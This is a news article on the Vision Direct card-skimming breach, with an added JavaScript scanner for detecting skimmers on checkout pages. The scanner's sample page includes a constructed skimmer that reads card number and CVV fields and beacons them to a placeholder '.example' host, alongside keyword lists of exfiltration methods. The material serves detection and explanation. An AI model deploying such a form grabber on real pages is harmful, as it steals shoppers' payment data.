By Mark Fairlie.

Any Vision Direct customer who logged into their account between 12.11am on 3rd November and 12.52pm on 8th November is at risk of having had their name, address, email address, password, telephone number and debit/credit card details (including the three-digit security code on the signature strip) stolen, the company has revealed.

According to the Times, the company’s customer database itself was not affected; the cybercriminals instead took the information as customers typed it into forms on the website. 16,300 customers have been affected by the breach, of whom 6,000 had their bank details taken.

The online computing site The Register says it has received a report from a reader who had received multiple notifications from their bank about repeated £250 transactions to unknown companies.

As reported on BBC News, a spokesperson said that the company will “compensate any customers who have suffered a financial loss as a result of this breach”.


Vision Direct’s website, as reported by TechCrunch, stated that

“(t)his data was compromised when entering data on the website and not from the Vision Direct database…The breach has been resolved and our website is working normally.”

The company revealed that although Visa, Mastercard and Maestro cardholders were affected, PayPal users’ payment details were not, although other data they entered on the site may have been stolen too.

The same site reports that the data was stolen via a JavaScript keylogger secretly installed on the company’s website: a script that captured what customers typed into the site’s forms in their own browser, which is why the database itself was untouched. The same keylogger was installed on the company’s websites in Ireland, the Netherlands, France, Spain, Italy and Belgium (source: Willem de Groot, Twitter).

The malicious script posed as Google Analytics code. Google Analytics is a legitimate service that allows Vision Direct and other companies to monitor how people find their site and what they do when they arrive there, so a script with that name on a checkout page would not look out of place to anyone glancing at the page source.
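The check below is an added example written for this page; it is not Vision Direct’s code and not the skimmer itself. It shows the two things a practitioner would look for on a checkout page after an incident like this one: an external script that is dressed up as Google Analytics but is served from an origin Google does not own, and an inline script that reads card fields and also has a way to send data off the page. The sample HTML, the hostnames ending in `.example` and the keyword lists are all constructed for the demo.

```javascript
// Added example, not code from Vision Direct or from the skimmer itself:
// a static check over a checkout page's HTML that flags (a) scripts that
// look like Google Analytics but are served from a non-Google origin and
// (b) inline scripts that read card fields and contain a way to send data
// off the page. The sample HTML and the *.example hostnames are constructed.

// Origins that actually serve the Google Analytics / Tag Manager loaders.
const GOOGLE_ANALYTICS_ORIGINS = new Set([
  "https://www.google-analytics.com",
  "https://ssl.google-analytics.com",
  "https://www.googletagmanager.com",
]);

// Path endings the genuine loaders use; a lookalike copies them.
const GA_PATH_HINTS = ["/analytics.js", "/ga.js", "/gtag/js", "/gtm.js"];

// Names a card-skimming script has to touch to read a checkout form.
const PAYMENT_FIELD_HINTS = ["cardnumber", "card_number", "ccnumber", "cvv", "cvc", "expir"];

// Ways an inline script can push captured values to a collection server.
const EXFIL_HINTS = ["sendBeacon", "XMLHttpRequest", "fetch(", "new Image", "WebSocket"];

// Pull every <script> tag (src attribute and inline body) out of raw HTML.
function parseScriptTags(html) {
  const tags = [];
  const tagRe = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const srcMatch = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(m[1]);
    tags.push({ src: srcMatch ? srcMatch[1] : null, body: m[2] });
  }
  return tags;
}

// True when a script URL is dressed up as Google Analytics but is not served
// from one of Google's own origins. Relative URLs (same-site) are not judged.
function isAnalyticsLookalike(src) {
  const absolute = src.startsWith("//") ? "https:" + src : src;
  let url;
  try { url = new URL(absolute); } catch (e) { return false; }
  const host = url.hostname.toLowerCase();
  const path = url.pathname.toLowerCase();
  const looksLikeGa =
    host.includes("google-analytics") ||
    host.includes("googletagmanager") ||
    GA_PATH_HINTS.some((h) => path.endsWith(h));
  return looksLikeGa && !GOOGLE_ANALYTICS_ORIGINS.has(url.origin);
}

// True when an inline script both names payment fields and has an exfil path.
function inlineReadsCardAndSends(body) {
  const text = body.toLowerCase();
  const readsCard = PAYMENT_FIELD_HINTS.some((h) => text.includes(h));
  const sends = EXFIL_HINTS.some((h) => text.includes(h.toLowerCase()));
  return readsCard && sends;
}

// Run both checks over a page and return one finding per suspicious script.
function scanHtmlForSkimmerIndicators(html) {
  const findings = [];
  for (const tag of parseScriptTags(html)) {
    if (tag.src !== null) {
      if (isAnalyticsLookalike(tag.src)) {
        findings.push({ kind: "analytics-lookalike", src: tag.src });
      }
    } else if (inlineReadsCardAndSends(tag.body)) {
      findings.push({ kind: "inline-card-exfil", snippet: tag.body.trim().slice(0, 60) });
    }
  }
  return findings;
}

// Constructed checkout page: one genuine GA loader, one lookalike served from
// a made-up domain, the site's own script, and an inline form grabber.
const SAMPLE_CHECKOUT_HTML = `
<script async src="https://www.google-analytics.com/analytics.js"></script>
<script src="https://www.google-analytics.com.stats-cdn.example/analytics.js"></script>
<script src="/static/js/checkout.js"></script>
<script>
  document.querySelector("form#payment").addEventListener("submit", function () {
    var n = document.getElementById("cardNumber").value;
    var c = document.getElementById("cvv").value;
    navigator.sendBeacon("https://collect.stats-cdn.example/g", n + "|" + c);
  });
</script>`;

console.log(scanHtmlForSkimmerIndicators(SAMPLE_CHECKOUT_HTML));
```

Two caveats. The origin check is the robust half: a script claiming to be Google Analytics but loaded from anywhere other than Google’s own hosts is worth a look regardless of what it contains. The keyword check on inline scripts is only a first pass, because a real skimmer is usually obfuscated and will not spell out `cvv` or `sendBeacon` in clear text. Preventing this class of attack rather than hunting for it is a matter of a Content Security Policy that limits which origins can serve scripts and receive data, plus Subresource Integrity hashes on the third-party scripts that remain.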


Vision Direct customers’ details stolen online

The malware that affected the Vision Direct sites was a keylogger.

A keylogger is a program that records the keys a person presses while using their computer. Although keyloggers are sometimes used by employers to monitor staff computer usage, many cybercriminals use them to steal passwords and other confidential information, according to Securelist.

According to the source-code search engine PublicWWW, as reported by Ars Technica, more than 2,000 websites running the popular WordPress platform are infected with keylogging malware. Another investigation, this time carried out by website security firm Sucuri, found keylogging malware on a further 5,500 WordPress sites.

Cybercriminals have begun to target financial institutions with keylogging software too, according to Investment News. As these institutions have started to take malware and hacker threats seriously, writes Ryan W. Neal, “a higher level of security is inspiring more sophisticated attacks”.

The particular keylogging malware families found on financial company computer systems are called Emotet and URSNIF, which

“infect a computer through a Microsoft Office document, can evade detection, and hijack transfer payments”.

It’s not just cybercriminals who use keyloggers. They are deployed on computers for various reasons, including monitoring children’s use of the internet. The KidLogger keylogger, available for $89 a year, saves children’s keystrokes to a text file for easy retrieval, so that a parent can check which websites their children are visiting and whom they are interacting with.